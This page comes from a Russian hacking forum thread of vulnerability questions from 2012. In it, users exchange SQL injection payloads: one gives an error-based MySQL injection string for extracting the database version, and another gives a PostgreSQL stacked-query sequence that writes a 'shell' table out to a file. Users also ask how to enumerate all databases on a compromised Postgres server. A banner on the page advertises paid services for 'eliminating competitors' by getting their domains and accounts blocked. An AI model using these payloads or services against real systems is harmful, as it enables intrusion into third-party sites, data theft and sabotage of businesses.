Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1891 из 2422

1891

Опции темы

Поиск в этой теме

Опции просмотра

10.01.2012, 06:40

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

С нами: 11322426

Репутация: 0

Цитата:

Сообщение от ~EviL~

В моем случае уязвимый параметр стоит в запросе после WHERE, что, как мне кажется, существенно ограничивает мои возможности...

where 'sqli'

sqli='and (1)=(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- x

𝕏 Twitter Reddit Telegram Копировать ссылку

10.01.2012, 15:53

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

M_script, как такие запросы строить? в какой статье можно прочитать?

10.01.2012, 16:01

stepashka_

Познавший АНТИЧАТ

Регистрация: 09.11.2009

Сообщений: 1,077

С нами: 8686406

Репутация: 265

Цитата:

Сообщение от faza02

M_script
, как такие запросы строить? в какой статье можно прочитать?

Например тут

10.01.2012, 16:32

Expl0ited

Познавший АНТИЧАТ

Регистрация: 16.07.2010

Сообщений: 1,022

С нами: 8328566

Репутация: 935

Цитата:

Сообщение от faza02

M_script
, как такие запросы строить? в какой статье можно прочитать?

Или тут.

10.01.2012, 16:55

BaleHoK

Участник форума

Регистрация: 30.09.2007

Сообщений: 116

С нами: 9796453

Репутация: 14

Перелопатил пол инета,ответ так и не нашел...Postgres >8 версия,рут...можно ли вывести все бд как в масе?

10.01.2012, 17:00

Ereee

Постоянный

Регистрация: 01.12.2011

Сообщений: 560

С нами: 7604246

Репутация: 267

Цитата:

Сообщение от BaleHoK

Перелопатил пол инета,ответ так и не нашел...Postgres >8 версия,рут...можно ли вывести все бд как в масе?

Вот че в нете нашел:

PHP код:


		
			
[COLOR="#000000"]?a=1;CREATE TABLE shell (a text);

?a=1;INSERT INTO shell(a) VALUES ('[COLOR="#0000BB"][/COLOR]');

?a=1;COPY shell (a) TO shellaaaa;

?a=1; DROP TABLE shell;

[/COLOR]

10.01.2012, 17:08

BaleHoK

Участник форума

Регистрация: 30.09.2007

Сообщений: 116

С нами: 9796453

Репутация: 14

Это и на ачате есть...мне не интересно выполнение команд...ибо скрипты и sql разнесены по сервакам...мне нужен аналог information_schemata как в mysql...существует ли он для постгрес

10.01.2012, 17:29

Ereee

Постоянный

Регистрация: 01.12.2011

Сообщений: 560

С нами: 7604246

Репутация: 267

Цитата:

Сообщение от BaleHoK

Копай в строну pg_tables.

10.01.2012, 17:41

BaleHoK

Участник форума

Регистрация: 30.09.2007

Сообщений: 116

С нами: 9796453

Репутация: 14

Прежде чем это написать не поленился бы и посмотрел для каких это версий..это было в старых постгрес..если не изменяет память

#10

10.01.2012, 17:45

Ereee

Постоянный

Регистрация: 01.12.2011

Сообщений: 560

С нами: 7604246

Репутация: 267

[QUOTE="BaleHoK"]
Прежде чем это написать не поленился бы и посмотрел для каких это версий..это было в старых постгрес..если не изменяет память

Страница 1891 из 2422

1891

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57